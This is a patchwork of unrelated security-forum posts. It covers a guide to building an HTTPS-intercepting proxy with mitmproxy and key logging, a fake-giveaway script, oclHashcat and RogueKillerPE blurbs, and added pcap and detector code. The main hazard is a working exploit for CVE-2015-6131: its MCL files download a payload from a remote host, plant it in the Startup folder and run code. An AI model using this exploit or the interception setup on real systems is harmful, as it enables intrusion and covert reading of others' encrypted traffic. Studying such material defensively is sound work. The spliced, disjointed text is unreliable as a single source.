The script also backs up old PCAPs to a separate machine by launching an external bash script upon the creation of a new PCAP file. As described above, there are also parameters to specify the remote backup server username, hostname, and path for SCPing the PCAPs.

Move the repository's splash.html and redirect.html to the WAN web server of your choice, as described above. Edit the link in splash.html to correspond to your Snifflab router's IP address.

Configure the backup script

Make sure to add the PCAP machine's public SSH key to the known_hosts file on the remote machine, or else movescript will prompt the user for a password.
Start capturing packets on startup: create a sniffer service

The simplest way to ensure reliably consistent packet capturing is to wrap sniffer.py in an upstart service, so it can easily be started on boot, and restarted as needed. To do that, create and edit the file below:

/etc/init/sniffer.conf:

    # sniffer.conf
    start on runlevel [2345]
    stop on runlevel [016]

    script
        # plain echo: "exec echo" would replace the shell and nothing below would run
        echo "hi"
        cd /home/pi/mitm
        # filenamesuffix is passed on the command line: service sniffer start filenamesuffix=...
        if [ -z "$filenamesuffix" ]; then
            exec python sniffer.py -i bond0 -s 100 -t 120
        else
            exec python sniffer.py -i bond0 -s 100 -t 120 -f "$filenamesuffix"
        fi
    end script

Make sure to edit the parameters of sniffer.py to suit your needs, based on the previous section. With this service all set up, it is easy to start / stop collecting packets:

    sudo service sniffer start

This service supports an additional parameter, a filename suffix. This will cause all pcaps collected by the service to be saved with the parameter as a file suffix. For instance, running

    sudo service sniffer start filenamesuffix=test1

will yield timestamped packets with test1 as a suffix, similar to 123456789_test1.pcap. This makes it easy to label collected pcaps. When starting a new test, simply restart the service with a new filename suffix:

    sudo service sniffer restart filenamesuffix=mynewtest

Of course, if the filenamesuffix parameter is missing, no suffix is included in the filename. After completing a test, I usually restart the service without a suffix, to cleanly demarcate the completion of the test in the filesystem.

The MITM Proxy machine

In our environment, we used a machine running the Ubuntu Server operating system to act as a proxy that replaces SSL certificates with those under our control. It does this by relying on the well-known mitmproxy software. Our MITM proxy machine exists outside of the Snifflab network, on the WAN. Snifflab forwards all traffic to this machine. This section describes how to configure a service that runs a transparent mitmproxy on startup.
First, install mitmproxy and mitmdump, following the guide on their website. Now, we can set up a default configuration for mitmproxy to refer to at runtime. In our environment, we created a directory:

    sudo mkdir /etc/mitmproxy
    sudo chmod -R 755 /etc/mitmproxy
    touch /etc/mitmproxy/common.conf

Edit common.conf to match the following:

    --cadir=/etc/mitmproxy/cybersniff
    --port=4567
    --noapp

I chose an arbitrary port number because I do not like using defaults (mitmproxy defaults to 8080). Now, create a directory to store the mitmproxy certificate authority information:

    mkdir cybersniff

Next, generate your own certificate for mitmdump to use as a CA. I do this so I don't have to trust mitmproxy's CA. Mitmproxy has a guide on how to generate your own certificate. I would recommend adding --days 1000 to the certificate generation step, to ensure the cert doesn't expire for some time. Make sure the certificate files are stored in the path referred to in common.conf.

Now, let's set up a service to ensure the proxy starts on boot, and can be easily started and stopped as needed:

    touch /etc/init/mitm.conf

Edit your newly created mitm.conf to include the following:

    # mitm.conf
    start on filesystem

    script
        sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567
        SSLKEYLOGFILE=/var/log/mitmkeys.log
        export SSLKEYLOGFILE
        echo "MITM Keys being logged here: $SSLKEYLOGFILE"
        exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf
    end script

This service does several things. First of all, it starts when the filesystem is loaded. You can also start, stop, and restart it using commands like:

    service mitm stop

Secondly, the service sets up iptables rules to route all incoming traffic on ports 80 and 443 to port 4567 (change this value to correspond to your mitmproxy port defined in common.conf). Next, it specifies an SSLKEYLOGFILE environment variable.
This is important, as it provides a place for mitmproxy to save the session keys used to set up encrypted communications. With these keys being routinely logged, we can point Wireshark to this location (discussed below), and use it to decrypt SSL traffic that uses Diffie-Hellman key exchange. Finally, the service runs mitmdump (a non-interactive version of mitmproxy) in transparent mode, using the configuration file we previously created.

Important: One last thing to do in order to ensure that devices connected to Snifflab can access HTTPS resources without a certificate error is to copy the generated .pem file for your custom CA certificate to the web directory where redirect.html is located. Edit the link in redirect.html (included in the Github repo, and hosted on your web server) to point users to download your pem file for them to install on their device. Of course, you can develop your own way of providing the certificate to devices on the network.

Analysing the data in Wireshark

To decrypt packets that have been encrypted using perfect forward secrecy, it's best to have the latest version of Wireshark installed. This might mean adding the Wireshark development PPA to your Ubuntu environment.

Next, configure Wireshark's Preferences > Protocols > SSL to utilize your MITM proxy's CA bundled certificate file as well as the master keys list mitmproxy is logging. Click on RSA Keys, and enter the following:

    IP address   Port   Protocol   Key File
    0.0.0.0      443    http       /path/to/mitmproxy-ca.pem

This tells Wireshark to attempt to decrypt all traffic (0.0.0.0 is a stand-in address for any IP) on port 443 as HTTP data, using your key file. Back in the main SSL protocol preference pane, set up an SSL debug file so you can assess any errors that might occur.
Finally, point (Pre)-Master-Secret log filename to the path set in the $SSLKEYLOGFILE environment variable (or a place you copy that log file to). With this, you can load any of the PCAP files collected on the SniffLab network and decrypt HTTPS connections! Happy hacking.

Sursa: http://kalilinuxcourse.blogspot.in/2015/12/how-to-perform-mitm-attack-on-https-traffic.html
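The article describes sniffer.py only by its behaviour (new pcap after a size limit or a time interval, files named by the unix time the capture began plus an optional suffix) and explains the pcap format only in prose. The block below is an added example, not the Snifflab project's code: a minimal writer for the classic pcap container with the same rotation rules, and a reader that parses the files back so the layout (24-byte global header, 16-byte per-record header, captured bytes) can be checked. The names RotatingPcapWriter, read_pcap and demo are this example's own, and every frame it writes is constructed, not captured traffic.

```python
# Added example, not the Snifflab project's sniffer.py: a minimal classic-pcap
# writer that rotates files as the post describes (new file after a byte limit or
# a time interval, named by the unix time the capture started plus an optional
# suffix) and a reader that parses the files back. All frames are constructed.
import os
import struct
import tempfile
import time

PCAP_MAGIC = 0xA1B2C3D4     # as read by a little-endian host; microsecond timestamps
LINKTYPE_ETHERNET = 1
GLOBAL_HEADER = "<IHHiIII"  # magic, major, minor, thiszone, sigfigs, snaplen, linktype
RECORD_HEADER = "<IIII"     # ts_sec, ts_usec, incl_len (captured), orig_len (on the wire)


def pcap_global_header(snaplen=65535, linktype=LINKTYPE_ETHERNET):
    return struct.pack(GLOBAL_HEADER, PCAP_MAGIC, 2, 4, 0, 0, snaplen, linktype)


def pcap_record(ts, frame, snaplen=65535):
    """One per-packet record; incl_len is shorter than orig_len if snaplen truncates."""
    captured = frame[:snaplen]
    sec = int(ts)
    usec = int(round((ts - sec) * 1_000_000))
    return struct.pack(RECORD_HEADER, sec, usec, len(captured), len(frame)) + captured


class RotatingPcapWriter:
    """Writes frames to <directory>/<unixtime>[_suffix].pcap and starts a new file
    when the current one would exceed max_bytes or has been open for max_seconds."""

    def __init__(self, directory, max_bytes, max_seconds, suffix=""):
        self.directory, self.max_bytes, self.max_seconds = directory, max_bytes, max_seconds
        self.suffix = suffix
        self.files = []          # paths in creation order
        self._fh, self._opened_at, self._bytes = None, 0.0, 0

    def _open(self, ts):
        base = f"{int(ts)}_{self.suffix}" if self.suffix else str(int(ts))
        path, n = os.path.join(self.directory, base + ".pcap"), 1
        while os.path.exists(path):   # two rotations in one second must not overwrite
            path, n = os.path.join(self.directory, f"{base}.{n}.pcap"), n + 1
        self._fh = open(path, "wb")
        self._fh.write(pcap_global_header())
        self._opened_at, self._bytes = ts, struct.calcsize(GLOBAL_HEADER)
        self.files.append(path)

    def write(self, frame, ts=None):
        ts = time.time() if ts is None else ts
        record = pcap_record(ts, frame)
        if self._fh is None:
            self._open(ts)
        elif self._bytes + len(record) > self.max_bytes or ts - self._opened_at >= self.max_seconds:
            self.close()
            self._open(ts)
        self._fh.write(record)
        self._bytes += len(record)

    def close(self):
        if self._fh is not None:
            self._fh.close()
            self._fh = None


def read_pcap(path):
    """Parse a classic pcap file: returns ((major, minor, linktype), [(ts, orig_len, bytes)])."""
    with open(path, "rb") as fh:
        fields = struct.unpack(GLOBAL_HEADER, fh.read(struct.calcsize(GLOBAL_HEADER)))
        magic, major, minor, _tz, _sig, _snaplen, linktype = fields
        if magic != PCAP_MAGIC:
            raise ValueError(f"{path}: unexpected magic {magic:#x}")
        packets = []
        while True:
            rh = fh.read(struct.calcsize(RECORD_HEADER))
            if len(rh) < struct.calcsize(RECORD_HEADER):
                break
            sec, usec, incl, orig = struct.unpack(RECORD_HEADER, rh)
            data = fh.read(incl)
            if len(data) < incl:
                raise ValueError(f"{path}: truncated record")
            packets.append((sec + usec / 1_000_000, orig, data))
    return (major, minor, linktype), packets


def demo(directory=None):
    """Eight constructed 60-byte frames, one per second, with room for three records
    per file: frames 0-6 rotate on size, frame 7 (300 s later) rotates on time."""
    directory = tempfile.mkdtemp() if directory is None else directory
    record_len = struct.calcsize(RECORD_HEADER) + 60
    writer = RotatingPcapWriter(directory, max_bytes=struct.calcsize(GLOBAL_HEADER) + 3 * record_len,
                                max_seconds=120, suffix="test1")
    frames = [bytes([i]) * 60 for i in range(8)]      # constructed, not captured
    stamps = [1_700_000_000.0 + i for i in range(7)] + [1_700_000_306.0]
    for frame, ts in zip(frames, stamps):
        writer.write(frame, ts=ts)
    writer.close()
    return writer.files, frames
```

Running demo() produces four files: 1700000000_test1.pcap, 1700000003_test1.pcap and 1700000006_test1.pcap are cut by the size limit, and 1700000306_test1.pcap is opened because the last frame arrives more than 120 seconds after the previous file started. Files written this way open in Wireshark as ordinary Ethernet captures, which is what the article's key-log decryption step expects as input.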
-
    function ctafinal() {
        setTimeout(function() {
            // "Sending your answers to KENT.ro": only the label changes, no request is made
            $(".loadertxt").txtFader("Trimitem raspunsurile catre KENT.ro");
            setTimeout(function() {
                // "Congratulations! You won!"
                $(".loadertxt").txtFader("Felicitari! Ai castigat!");
                setTimeout(function() {
                    $("#final").fadeOut(250, function() {
                        $("#finalcta").fadeIn(250);
                    });
                }, 3000);
            }, 3000);
        }, 2500);
    }

    $(".loadertxt").txtFader("Trimitem raspunsurile catre KENT.ro");
    setTimeout(function() {
        $(".loadertxt").txtFader("Felicitari! Ai castigat!");

Look at that: it knows you've won without sending anything to "kent.ro". Yet another piece of junk that lets you see how many seriously thick-headed friends you have. Understand this: NOTHING is free in this world.
-
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)
Software Vendor: Microsoft
Software version: MS Windows Media Center latest version on any Windows OS.
Software Vendor Homepage: http://www.microsoft.com
CVE: CVE-2015-6131
Exploit Author: Eduardo Braun Prado
Vulnerability official discoverer: Zhang YunHai of NSFOCUS Security Team
Date: December 8, 2015

Vulnerability description:

Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside the Windows Media Center window, in the context of the local machine security zone of the Internet Explorer browser. This in turn allows execution of arbitrary code using e.g. ADO ActiveX Objects. AKA "self-executing" MCL files.

Exploit code below:

----------- self-exec-1.mcl ------------------------------------
<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>
------------------------------------------------------------

---------- self-exec-2.mcl --------------------------------------
<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script>
RecordsetURL='http://192.168.10.10:80/recordsetfile.txt';
var rs = new ActiveXObject('ADODB.recordset');
rs.Open(RecordsetURL);
rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta');
rs.Close();
</script></html>
----------------------------------------------------------

----- Create-recordsetfile.hta --------------
<html><body onload="aa()">
<script language="VBScript">
function aa()
defdir="."
alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt""."
Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs = CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al = rs.Save(defdir & "\recordsetfile.txt")
rs.close
end function
</script></body></html>
-------------------------------------------------------------------------------

--------- recordsetdata.txt ------------------------------------------
<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------

Sursa: https://www.exploit-db.com/exploits/38911/
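The advisory's trigger is structural: an MCL whose application url names an .mcl file, followed by HTML or script markup in the same document. The block below is an added example, not part of the exploit-db post or of any Microsoft tooling: a static triage check that looks for exactly that pairing so files of this shape can be flagged in a mail gateway or on a file share. The functions analyze_mcl and triage are this example's own; the first sample body is the one quoted in the post, the others are constructed.

```python
# Added example, not part of the exploit-db post: static triage for MCL files that
# point their <application url="..."> at an .mcl file (so the document is rendered
# as its own local-zone HTML page) and carry HTML/script markup after it.
import re

APP_URL_RE = re.compile(r'<application\b[^>]*?\burl\s*=\s*["\']([^"\']*)["\']', re.IGNORECASE)
MARKUP_RE = re.compile(r'<(?:html|script|object|iframe|img)\b', re.IGNORECASE)


def analyze_mcl(content):
    """Return findings for one MCL document.

    mcl_target:      the application url names an .mcl file (the self-reference trigger)
    embedded_markup: HTML or script tags follow the application element
    suspicious:      both hold, the pairing the advisory describes"""
    m = APP_URL_RE.search(content)
    url = m.group(1).strip() if m else None
    mcl_target = url is not None and url.lower().endswith(".mcl")
    tail = content[m.end():] if m else content
    embedded = MARKUP_RE.search(tail) is not None
    return {
        "application_url": url,
        "mcl_target": mcl_target,
        "embedded_markup": embedded,
        "suspicious": mcl_target and embedded,
    }


def triage(documents):
    """documents: {filename: content}; returns the names judged suspicious, sorted."""
    return sorted(name for name, body in documents.items() if analyze_mcl(body)["suspicious"])


SAMPLES = {
    # quoted from the advisory above (harmless alert payload)
    "self-exec-1.mcl": '<application url="self-exec1.mcl"/><html><script>alert(\' I am running in '
                       'local machine zone which allows arbitrary code execution via, for example, '
                       'ADO Objects\')</script></html>',
    # constructed: same shape with different casing, quoting and line breaks
    "upper-case.mcl": "<APPLICATION URL='evil.mcl' />\r\n<html><script>x</script></html>",
    # constructed: an ordinary launcher that points at a web application
    "launcher.mcl": '<application url="http://example.invalid/mediacenter/start" name="Example" />',
    # constructed: references another .mcl but carries no markup, so it is not flagged
    "chained.mcl": '<application url="other.mcl"/>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, analyze_mcl(body))
    print("suspicious:", triage(SAMPLES))
```

The check is deliberately coarse: it reports the combination of features the advisory names rather than trying to interpret the script, so a reviewer still looks at anything flagged. An MCL that merely references another .mcl without embedded markup is reported as mcl_target but not as suspicious.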
-
Check out our GitHub Repository for the latest development version

GPU Driver requirements:

- NV users require ForceWare 346.59 or later
- AMD users require Catalyst 14.9 or later

Features

- World's fastest password cracker
- World's first and only GPGPU based rule engine
- Free Open-Source
- Multi-GPU (up to 128 gpus)
- Multi-Hash (up to 100 million hashes)
- Multi-OS (Linux & Windows native binaries)
- Multi-Platform (OpenCL & CUDA support)
- Multi-Algo (see below)
- Low resource utilization, you can still watch movies or play games while cracking
- Focuses highly iterated modern hashes
- Focuses dictionary based attacks
- Supports distributed cracking
- Supports pause / resume while cracking
- Supports sessions
- Supports restore
- Supports reading words from file
- Supports reading words from stdin
- Supports hex-salt
- Supports hex-charset
- Built-in benchmarking system
- Integrated thermal watchdog
- 150+ Algorithms implemented with performance in mind
- ... and much more

[oclHashcat Screenshot: image not included]

Attack-Modes

- Straight *
- Combination
- Brute-force
- Hybrid dict + mask
- Hybrid mask + dict

* accept Rules

Link: oclHashcat - advanced password recovery
-
RogueKillerPE

Description

RogueKillerPE is a PE parsing tool, able to show the internal structure of executable files. It's able to read either the memory image (process module) or the disk image (filesystem) of a given executable.

    RogueKillerPE 32 bits: Download (14 MB)
    RogueKillerPE 64 bits: Download (14 MB)

Features:

- Open PE from file, and read disk image.
- Open PE from process, and read memory or disk image.
- Open file from command line.
- Drag and drop support.
- Process general information (pid, parent, ...)
- File general information (attributes, size, ...)
- Process module general information (address, size, ...)
- A bunch of hashes (MD5, SHA1, SHA256, ...)
- Process memory pages, with ability to dump.
- Injected pages detection, non-readable pages detection.
- Ability to dump injected pages to file.
- Hex code, with ability to search (hex values, or string ANSI/UNICODE).
- Assembly code, with ability to navigate.
- PE Headers (MZ, PE, Optional, ...)
- RunPE detection, shows which header fields are modified.
- Checksum validation.
- PE Sections, with ability to watch hex code and dump to file.
- PE Imports, with ability to watch APIs assembly code (memory only).
- PE Exports, with ability to watch APIs assembly code.
- Hooks detection in imports/exports (table and inline hooks).
- PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, ...)
- Executable files detection in resources.
- Ability to watch hex code of resources.
- Ability to dump resources to file.
- PDB path detection.
- Strings scanner, with classification (Registry, files, ...)
- Ability to dump all strings (by category or not) to file.

User guide

- Start the tool.
- Drag a file on the interface, or load the process list.
- If you choose a file, there you go.
- If you choose a process, you can inspect a different module by selecting a new one in the modules list.
- If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa.

Sursa: RogueKillerPE download